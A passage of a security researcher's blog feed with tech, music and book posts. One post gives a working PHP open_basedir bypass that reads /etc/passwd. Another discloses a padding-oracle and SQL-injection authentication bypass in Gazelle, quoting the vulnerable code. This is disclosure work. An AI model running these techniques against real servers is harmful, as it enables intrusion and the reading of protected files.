since the equivalence-based verification is <em>slow</em> (between 0.1s and ~300s),
it's only done once at the end. They found out that "optimization progress is roughly logarithmic
in the number of mutations." CryptOpt generates code around 1.20 to 2.50 times
faster than gcc/clang for the same fiat-crypto generated C code. It's not
faster than OpenSSL (but offers formally verified correctness), but is
faster than libsecp256k1.</p>
<p>The paper was <a href="https://iacr.org/submit/files/slides/2023/rwc/rwc2023/85/slides.pdf">presented</a> at <a href="https://rwc.iacr.org/2023/program.php">Real World Crypto 2023</a>,
and like all good ones, it came with an <a href="https://github.com/0xADE1A1DE/CryptOpt">implementation</a>.</p></content><category term="paper_notes"></category></entry><entry><title>Managing a bouncer via OpenRC</title><link href="https://dustri.org/b/managing-a-bouncer-via-openrc.html" rel="alternate"></link><published>2023-11-24T16:30:00+01:00</published><updated>2023-11-24T16:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-11-24:/b/managing-a-bouncer-via-openrc.html</id><summary type="html"><p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
tend to only work when one is connected, they're both running inside a
<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
But now that my hypervisor is automatically rebooting to apply security updates,
and during power …</p></summary><content type="html"><p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
tend to only work when one is connected, they're both running inside a
<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
But now that my hypervisor is automatically rebooting to apply security updates,
and during power cuts via <a href="https://networkupstools.org/">nut</a>,
I needed a way to automatically restart the bouncer. Since
it's running in an <a href="https://www.alpinelinux.org/">Alpine Linux</a> container,
here is my solution in the form of an <a href="https://github.com/OpenRC/openrc">OpenRC</a>
service script, because I couldn't find one on the internet:</p>
<div class="codehilite"><pre><span></span><code><span class="ch">#!/sbin/openrc-run</span>
<span class="nv">USER</span><span class="o">=</span>jvoisin
<span class="nv">name</span><span class="o">=</span><span class="s2">&quot;chat&quot;</span>
<span class="nv">command_user</span><span class="o">=</span><span class="s2">&quot;</span><span class="nv">$USER</span><span class="s2">&quot;</span>
<span class="nv">command</span><span class="o">=</span>/usr/bin/tmux
<span class="nv">command_args</span><span class="o">=</span><span class="s2">&quot;new-session -s chat -d &#39;/usr/bin/weechat&#39; \; new-window &#39;/usr/bin/profanity&#39; \; select-window -t -1&quot;</span>
<span class="nv">pidfile</span><span class="o">=</span><span class="s2">&quot;/run/</span><span class="nv">$SVCNAME</span><span class="s2">.pid&quot;</span>
depend<span class="o">()</span><span class="w"> </span><span class="o">{</span>
<span class="w"> </span>need<span class="w"> </span>net
<span class="w"> </span>use<span class="w"> </span>dns<span class="w"> </span>
<span class="o">}</span><span class="w"> </span>
stop<span class="o">()</span><span class="w"> </span><span class="o">{</span>
<span class="w"> </span>su<span class="w"> </span><span class="s2">&quot;</span><span class="nv">$USER</span><span class="s2">&quot;</span><span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;tmux kill-session -t chat&#39;</span>
<span class="o">}</span>
</code></pre></div></content><category term="sysadmin"></category></entry><entry><title>Netra - Ingrats</title><link href="https://dustri.org/b/netra-ingrats.html" rel="alternate"></link><published>2023-11-18T22:45:00+01:00</published><updated>2023-11-18T22:45:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-11-18:/b/netra-ingrats.html</id><summary type="html"><p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren &amp; der Club of
Gore</a> in equal
measures, bound together with a …</p></summary><content type="html"><p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren &amp; der Club of
Gore</a> in equal
measures, bound together with a hint of depressive darkwave, resulting
in a not only surprisingly cohesive and daring record, but also an excessively
pleasant and honest one.</p>
<p>Opening with "Gimme a break", a mellow jazzy noir blues vibe where one wants to
snap in rhythm, things quickly devolve into blast beats, raw screams and
twisted guitar of "Everything’s Fine", arguably the most black-metal-esque song
of the album. Albeit it is way more than yet-another-black-metal-track,
morphing into something more complex, with an eerie piano melody, and some
almost gothic rock clear singing. The sudden transitions are perfectly
executed, and the work on the voices is truly delicious, resulting in an
alienating, impetuous yet melancholic track. "Underneath my words the ruins of
yours" is a subtle mix of trip-hop and atmospheric post-rock/darkwave,
pursuing with "Live with It", even more trip-hop, but this time with a
<a href="https://en.wikipedia.org/wiki/Syncopation">syncopated</a> rhythm, 80s gothic
rock, clean vocals and acoustic guitars, … it results in something like
Katatonia doing a feat with <a href="https://en.wikipedia.org/wiki/Gramatik">Gramatik</a>
and <a href="https://en.wikipedia.org/wiki/Ulver">Ulver</a> period early 2000s.</p>
<p>Then the calm before the storm, "Infinite boredom", a one minute interlude of grainy piano under the rain,
announcing "Don't Keep Me Waiting", some sort of nihilist black metal track,
but with the noted presence of a saxophone and some clear touches of jazz. The presence of a whispered sample
from <a href="https://en.wikipedia.org/wiki/The_Minister">L’exercice de l’État</a>
has a gentle touch of <a href="https://www.metal-archives.com/bands/B%C3%A2%27a/3540445572">Ba'a</a>. Moving on
to "A Genuinely Benevolent Man", starting with synthesisers,
then a 4|4 kick resulting in something that could be on a <a href="https://en.wikipedia.org/wiki/VNV_Nation">VNV Nation</a> album.
Until it decays into something more raw, and when the shrieking vocals
are showing up, you didn't even realise that we've left the world of the darkwave
to return into the one of black metal.</p>
<p>"Paris or Me", dark and rainy, with bits of trip-hop percussion,
introducing "Could've, Should've, Would've", with tasteful hints of Depeche Mode, Dead Can Dance,
post-2000 Velvet Acid Christ, giving it a resolute tasteful darkwave-synth-pop-EBM
cocktail. The album ends with "Jusqu'au-boutiste", starting with some jazzy piano on a <a href="https://en.wikipedia.org/wiki/Bassline#Walking_bass">walking
bass</a>, turning into an ultra-saturated tremolo riff with blast beats,
and both worlds are alternating along the track, only interrupted by a very à
propos sample from <a href="https://en.wikipedia.org/wiki/Low_Down">Low Down</a>. It goes
on until the piano gets creepier and creepier, landing into strings,
morphing into dislocated trip-hop soul, beaching onto calm synthesisers,
and ending with raw black metal as background for electronic sounds.</p>
<p>As <a href="https://hypnoticdirgerecords.com/">Hypnotic Dirge Records</a>, the label on which the disc was produced, perfectly
summarised:</p>
<blockquote>
<p>The perfect soundtrack for late-night walks in the city. The material on
“Ingrats” is an all-out assault on the senses, a bitter pill that must be
swallowed as an accompaniment for self-reflection. An album which can connect
emotionally and leave you drained at the end.</p>
</blockquote></content><category term="music"></category></entry><entry><title>ini_set based open_basedir bypass</title><link href="https://dustri.org/b/ini_set-based-open_basedir-bypass.html" rel="alternate"></link><published>2023-11-03T16:30:00+01:00</published><updated>2023-11-03T16:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-11-03:/b/ini_set-based-open_basedir-bypass.html</id><summary type="html"><p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
by being the expected solution for his
<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
for InsomniHack Finals 2019, but has been known long before.</p>
<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
<blockquote>
<p>When a script tries to access the filesystem, for example using include,
or fopen(), the …</p></blockquote></summary><content type="html"><p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
by being the expected solution for his
<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
for InsomniHack Finals 2019, but has been known long before.</p>
<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
<blockquote>
<p>When a script tries to access the filesystem, for example using include,
or fopen(), the location of the file is checked. When the file is outside the
specified directory-tree, PHP will refuse to access it. All symbolic links are
resolved, so it's not possible to avoid this restriction with a symlink. If the
file doesn't exist then the symlink couldn't be resolved and the filename is
compared to (a resolved) open_basedir. </p>
<p>[…]</p>
<p>open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed. </p>
</blockquote>
<p>It has been more or less fixed in <a href="https://github.com/php/php-src/commit/ee9e07541f9f07762e3ee781102eea3a4190787c">March 2021</a>,
then again in <a href="https://github.com/php/php-src/commit/61e98bf35eb939bdd7b27ad7938f8549db2e1551">March 2023</a>,
and again in <a href="https://github.com/php/php-src/commit/9bcdf219ec6e8d6c2a55f1712b7d868b9129ef8d">July 2023</a>.
But I wouldn't be surprised if more low-hanging bypasses were lurking ;)</p>
<p>The crux of the bypass is that PHP didn't resolve relative paths, neither in
<code>ini_set</code> nor when checking in <code>php_check_open_basedir</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;?</span><span class="nx">php</span>
<span class="k">echo</span> <span class="nb">ini_get</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">);</span> <span class="c1">// /var/www/html</span>
<span class="nb">mkdir</span><span class="p">(</span><span class="s1">&#39;./tmp&#39;</span><span class="p">);</span>
<span class="nb">chdir</span><span class="p">(</span><span class="s1">&#39;./tmp&#39;</span><span class="p">);</span>
<span class="nb">ini_set</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">,</span> <span class="s1">&#39;..&#39;</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;=</span> <span class="mi">24</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">chdir</span><span class="p">(</span><span class="s1">&#39;..&#39;</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">ini_set</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">,</span><span class="s1">&#39;/&#39;</span><span class="p">)</span>
<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">&quot;/etc/passwd&quot;</span><span class="p">);</span>
</code></pre></div></content><category term="php"></category></entry><entry><title>Book review: Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</title><link href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html" rel="alternate"></link><published>2023-10-20T18:00:00+02:00</published><updated>2023-10-20T18:00:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-10-20:/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html</id><summary type="html"><p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
<p>I'm starting to feel guilty about getting ebooks for free from
<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
send them my way in exchange for a review, so I won't complain.</p>
<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
Impressioning …</a></p></summary><content type="html"><p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
<p>I'm starting to feel guilty about getting ebooks for free from
<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
send them my way in exchange for a review, so I won't complain.</p>
<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
Impressioning, and Safe Cracking</a>!
It's obviously a book about lockpicking, but, as <em>hinted</em> by its name,
from the <a href="https://www.lockwiki.com/index.php/Locksport">sport</a> angle.</p>
<p>I'm not completely clueless when it comes to picking locks, but I've always been
mediocre at best, since I never really put the effort into practising anything
but the basics. This was thus a great opportunity for a deeper dive!
So I got myself a <a href="https://covertinstruments.com/collections/lockpicks/products/genesis-lock-pick">proper set of picks</a>,
3 cutaway training locks: <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-serrated-pins">one with serrated pins</a>,
<a href="https://www.sparrowslockpicks.com/products/cut-away-lock-spool-pins">with spool pins</a>,
and <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-check-pins">one with stupid chess pieces pins</a>,
and a couple of locks/padlocks from my local locksmith, and dove into the book!</p>
<p>I was a bit curious about its content, since I didn't bother reading the table of contents,
and was expecting a pile of techniques to open <a href="https://en.wikipedia.org/wiki/Wafer_tumbler_lock">wafer tumbler locks</a>
in the fastest way possible. But the book is so much more than that, with
historical perspectives, a bit of legalese, the proper etiquette to participate in lockpicking
competitions and how to organise one, anecdotes, mechanical details and
resources for those who <a href="https://en.wikipedia.org/wiki/Starship_Troopers_(film)">would like to know
more</a>, how to tear
apart, modify, take care of, and reassemble locks, where to get equipment,
how to <a href="https://www.lockwiki.com/index.php/Impressioning">impression keys</a>,
details on <a href="https://en.wikipedia.org/wiki/Lever_tumbler_lock">lever tumbler locks</a>
and <a href="https://en.wikipedia.org/wiki/Safe">vaults</a>,
…</p>
<p>The part about wafer locks, while interesting, doesn't really go much further
than some basic techniques for entry-level <a href="https://lockwiki.com/index.php/Security_pin#Security_pin_illustrations">security pins</a>,
but I guess practise is the only way to learn how to handle anything non-trivial anyway.
On the other hand, the part about lever locks was highly entertaining,
since those are really weird compared to the <em>usual</em> locks,
and I didn't know much about them.</p>
<p>I recently gifted myself a <a href="https://www.sparrowslockpicks.com/products/challenge-vault">Sparrow's challenge vault</a> for my birthday,
and was thus highly delighted to discover that the book has a whole section
on <a href="https://en.wikipedia.org/wiki/Safe-cracking">safe manipulation</a>, which is
fortunate since the instructions coming with the vault are <s>pure garbage</s>
confusing at best.</p>
<p>The only issue I had with the book is that while it's full of gorgeous colourful
pictures, like the small marks left by pins during key impressioning,
they are unfortunately barely legible on my
<a href="https://www.pocketbook-int.com/ge/products/pocketbook-inkpad-3">Pocketbook InkPad 3</a>,
so I'd recommend getting the paperback version if you don't have a 𝖙𝖗𝖚𝖊𝖈𝖔𝖑𝖔𝖗 4𝖐
𝕳𝕯𝕽 e-reader.</p>
<p>All in all, it's a really great self-contained book for newcomers and beginners,
entertaining, detailed, … and doing a tremendous job at making
lockpicking competitions look cool yet accessible! It was also a nice motivation booster for me to
tackle harder locks.</p>
<p>If you already know your way around locks, you might want to look at <a href="https://www.barnesandnoble.com/w/high-security-mechanical-locks-graham-pulford/1111341233">High-Security Mechanical Locks: An
Encyclopedic
Reference</a> instead.</p></content><category term="book_reviews"></category></entry><entry><title>Authentication bypass on What.CD's Gazelle</title><link href="https://dustri.org/b/authentication-bypass-on-whatcds-gazelle.html" rel="alternate"></link><published>2023-10-13T19:45:00+02:00</published><updated>2023-10-13T19:45:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-10-13:/b/authentication-bypass-on-whatcds-gazelle.html</id><summary type="html"><p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
their "web framework geared towards private BitTorrent tracker" anymore.
I've been sitting on this one for years, I know I wasn't the only one,
and it's not the only low-hanging vulnerability lurking there.</p>
<p>Rolling your own blunt …</p></summary><content type="html"><p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
their "web framework geared towards private BitTorrent tracker" anymore.
I've been sitting on this one for years, I know I wasn't the only one,
and it's not the only low-hanging vulnerability lurking there.</p>
<p>Rolling your own blunt is alright, rolling your own authentication scheme
less so: there is a trivial <a href="https://en.wikipedia.org/wiki/Padding_oracle_attack">padding oracle</a>
in the <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/encrypt.class.php#L24">homegrown crypto scheme</a>:</p>
<div class="codehilite"><pre><span></span><code><span class="k">public</span> <span class="k">function</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">,</span> <span class="nv">$Key</span> <span class="o">=</span> <span class="nx">ENCKEY</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$CryptStr</span> <span class="o">!=</span> <span class="s1">&#39;&#39;</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$IV</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span>
<span class="nv">$CryptStr</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">16</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">trim</span><span class="p">(</span><span class="nb">mcrypt_decrypt</span><span class="p">(</span><span class="nx">MCRYPT_RIJNDAEL_128</span><span class="p">,</span> <span class="nv">$Key</span><span class="p">,</span> <span class="nv">$CryptStr</span><span class="p">,</span> <span class="nx">MCRYPT_MODE_CBC</span><span class="p">,</span> <span class="nv">$IV</span><span class="p">));</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>leading to an <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/ajax_start.php#L23-L31">authentication bypass via a SQL injection</a>:</p>
<div class="codehilite"><pre><span></span><code><span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;session&#39;</span><span class="p">]))</span> <span class="p">{</span>
<span class="nv">$LoginCookie</span> <span class="o">=</span> <span class="nv">$Enc</span><span class="o">-&gt;</span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;session&#39;</span><span class="p">]);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">))</span> <span class="p">{</span>
<span class="k">list</span><span class="p">(</span><span class="nv">$SessionID</span><span class="p">,</span> <span class="nv">$UserID</span><span class="p">)</span> <span class="o">=</span> <span class="nb">explode</span><span class="p">(</span><span class="s2">&quot;|~|&quot;</span><span class="p">,</span> <span class="nv">$Enc</span><span class="o">-&gt;</span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$UserID</span> <span class="o">||</span> <span class="o">!</span><span class="nv">$SessionID</span><span class="p">)</span> <span class="p">{</span>
<span class="k">die</span><span class="p">(</span><span class="s1">&#39;Not logged in!&#39;</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$Enabled</span> <span class="o">=</span> <span class="nv">$Cache</span><span class="o">-&gt;</span><span class="na">get_value</span><span class="p">(</span><span class="s2">&quot;enabled_</span><span class="si">$UserID</span><span class="s2">&quot;</span><span class="p">))</span> <span class="p">{</span>
<span class="k">require</span><span class="p">(</span><span class="nx">SERVER_ROOT</span><span class="o">.</span><span class="s1">&#39;/classes/mysql.class.php&#39;</span><span class="p">);</span> <span class="c1">//Require the database wrapper</span>
<span class="nv">$DB</span> <span class="o">=</span> <span class="k">NEW</span> <span class="nx">DB_MYSQL</span><span class="p">;</span> <span class="c1">//Load the database wrapper</span>
<span class="nv">$DB</span><span class="o">-&gt;</span><span class="na">query</span><span class="p">(</span><span class="s2">&quot;</span>
<span class="s2"> SELECT Enabled</span>
<span class="s2"> FROM users_main</span>
<span class="s2"> WHERE ID = &#39;</span><span class="si">$UserID</span><span class="s2">&#39;&quot;</span><span class="p">);</span>
<span class="k">list</span><span class="p">(</span><span class="nv">$Enabled</span><span class="p">)</span> <span class="o">=</span> <span class="nv">$DB</span><span class="o">-&gt;</span><span class="na">next_record</span><span class="p">();</span>
<span class="nv">$Cache</span><span class="o">-&gt;</span><span class="na">cache_value</span><span class="p">(</span><span class="s2">&quot;enabled_</span><span class="si">$UserID</span><span class="s2">&quot;</span><span class="p">,</span> <span class="nv">$Enabled</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">die</span><span class="p">(</span><span class="s1">&#39;Not logged in!&#39;</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>Conveniently, the oracle doesn't touch the database, is completely stateless,
and only shows up in the httpd/reverse-proxy's logs, which shouldn't log the cookies'
content, making forensic analysis nigh impossible. Once you're admin, there are
a bunch of available SQL injections, like in
<a href="https://github.com/WhatCD/Gazelle/blob/master/sections/reportsv2/takeresolve.php"><code>takeresolve.php</code></a>.
From there, remote code execution is doable, but left as an exercise for the
reader.</p></content><category term="security"></category></entry><entry><title>Video acceleration in Jellyfin inside a Proxmox container</title><link href="https://dustri.org/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html" rel="alternate"></link><published>2023-10-01T22:15:00+02:00</published><updated>2023-10-01T22:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-10-01:/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html</id><summary type="html"><p>For various reasons, including "video decoding is hard", "your web browser hates you"
and "watching movies on a phone over 3G is a basic human necessity",
enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
is a desirable goal if you don't want your CPU to set your house on fire. </p>
<p>To attain …</p></summary><content type="html"><p>For various reasons, including "video decoding is hard", "your web browser hates you"
and "watching movies on a phone over 3G is a basic human necessity",
enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
is a desirable goal if you don't want your CPU to set your house on fire. </p>
<p>To attain it, one can mess around with <a href="https://github.com/ddimick/proxmox-lxc-idmapper">cryptic gid mappings</a>,
but granting every user on the hypervisor the right to read/write <code>/dev/dri/renderD128</code> and
<code>/dev/dri/card0</code> is way easier, and it looks like this:</p>
<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>&gt;<span class="w"> </span>/etc/udev/rules.d/99-intel-chmod666.rules<span class="w"> </span>&lt;&lt;<span class="w"> </span><span class="s1">&#39;EOF&#39;</span>
<span class="go">KERNEL==&quot;renderD128&quot;, MODE=&quot;0666&quot;</span>
<span class="go">KERNEL==&quot;card0&quot;, MODE=&quot;0666&quot;</span>
<span class="go">EOF</span>
<span class="gp"># </span>udevadm<span class="w"> </span>control<span class="w"> </span>--reload-rules<span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span>udevadm<span class="w"> </span>trigger
<span class="gp">#</span>
</code></pre></div>
<p>It doesn't really worsen security, since:</p>
<ul>
<li>the devices are only mounted inside my jellyfin container, which would have
the same privileges as if I used gid mapping.</li>
<li>odds are that an attacker able to get a shell on the hypervisor wouldn't
really need to have r/w access to the two devices to escalate their
privileges anyway, since they would either be:
<ul>
<li>root already to escape from a container</li>
<li>root already to escape from a vm</li>
<li>whatever proxmox user and likely able to escalate to <code>root</code> trivially</li>
</ul>
</li>
<li>other users are sandboxed via systemd and/or seccomp.</li>
</ul>
<p>Speaking of mounting things inside the container:</p>
<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>&gt;<span class="w"> </span>/etc/pve/lxc/114.conf<span class="w"> </span>&lt;&lt;<span class="w"> </span><span class="s1">&#39;EOF&#39;</span>
<span class="go">lxc.cgroup2.devices.allow: c 226:0 rwm</span>
<span class="go">lxc.cgroup2.devices.allow: c 226:128 rwm</span>
<span class="go">lxc.mount.entry: /dev/dri dev/dri none bind,optional,create=dir</span>
<span class="go">lxc.mount.entry: /dev/dri/renderD128 dev/renderD128 none bind,optional,create=file</span>
<span class="go">EOF</span>
<span class="gp">#</span>
</code></pre></div>
<p>You can now run <code>vainfo</code> inside the container and be delighted by the
presence of the <a href="https://en.wikipedia.org/wiki/Video_Acceleration_API">VA-API</a> version number:</p>
<div class="codehilite"><pre><span></span><code><span class="gp"># </span>vainfo<span class="w"> </span><span class="m">2</span>&gt;/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">1</span>
<span class="go">libva info: VA-API version 1.17.0</span>
<span class="gp">#</span>
</code></pre></div>
<p>The last step is to tick all the boxes in <a href="https://jellyfin.org/docs/general/administration/hardware-acceleration/">Jellyfin's
preferences</a>
and you're good to go. Don't forget to make some space on the disk for the
transcoding cache, at least until <a href="https://github.com/jellyfin/jellyfin/pull/8744">this</a>
makes its way into a release.</p></content><category term="sysadmin"></category></entry><entry><title>Paper notes: Breaking Bad: Quantifying the Addiction of Web Elements to JavaScript</title><link href="https://dustri.org/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html" rel="alternate"></link><published>2023-09-26T17:15:00+02:00</published><updated>2023-09-26T17:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-26:/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html</id><summary type="html"><p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
will at some point contain the following line: "No, javascript isn't disabled
by default because too many sites would break. You can always crank the
security slider all the way up if you want tho."</p>
<p>We all agree …</p></summary><content type="html"><p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
will at some point contain the following line: "No, javascript isn't disabled
by default because too many sites would break. You can always crank the
security slider all the way up if you want tho."</p>
<p>We all agree that javascript enables all sorts of despicable behaviours making
the web a nightmare-material privacy/security cesspit and completely
inscrutable to a lot of users, so having research done
to quantify how to make it a better place for everyone is always more than welcome.</p>
<p>The main idea of the paper is to load pages from the <a href="https://hispar.cs.duke.edu/">Hispar
set</a> with and without <code>javascript.enabled</code> set,
via <a href="https://pptr.dev">Puppeteer</a>, and to perform
magic human-assisted smart diffing to detect user-perceived/perceivable
breakages. </p>
<p>The paper is full of fancy graphs and analysis, but the <a href="https://en.wikipedia.org/wiki/TL;DR">tldr</a> is:</p>
<blockquote>
<p>We discover that 43 % of web pages are not strictly dependent on JavaScript
and that more than 67 % of pages are likely to be usable as long as the visitor
only requires the content from the main section of the page, for which the user
most likely reached the page, while reducing the number of tracking requests by
85 % on average.</p>
</blockquote>
<p>An interesting take is that the usage of javascript frameworks is the main
source of breakage, since <s>a lot</s> all of them result in completely
unusable websites when javascript is disabled. Moreover, anecdotal data seems
to suggest that the bigger a company is, the more their website is going to
break when javascript is disabled.</p>
<p>And like every decent paper, it comes with the <a href="https://gitlab.inria.fr/Spirals/breaking-bad">related code and data published</a>.</p></content><category term="paper_notes"></category></entry><entry><title>Snuffleupagus 0.10.0 - Babar the Elephant</title><link href="https://dustri.org/b/snuffleupagus-0100-babar-the-elephant.html" rel="alternate"></link><published>2023-09-20T15:25:00+02:00</published><updated>2023-09-20T15:25:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-20:/b/snuffleupagus-0100-babar-the-elephant.html</id><summary type="html"><p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
<p>I just published a new release of
<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
the hardening module for php7+ and php8+,
version <code>0.9.0</code>, codename "Babar the Elephant",
named after the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
The main new feature is the PHP8.3 support, but there are a couple of
quality-of-life improvements for people using Snuffleupagus with fuzzers …</p></summary><content type="html"><p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
<p>I just published a new release of
<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
the hardening module for php7+ and php8+,
version <code>0.9.0</code>, codename "Babar the Elephant",
named after the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
The main new feature is the PHP8.3 support, but there are a couple of
quality-of-life improvements for people using Snuffleupagus with fuzzers as
well.</p>
<h3>Changelog</h3>
<ul>
<li>Compatibility with PHP8.3</li>
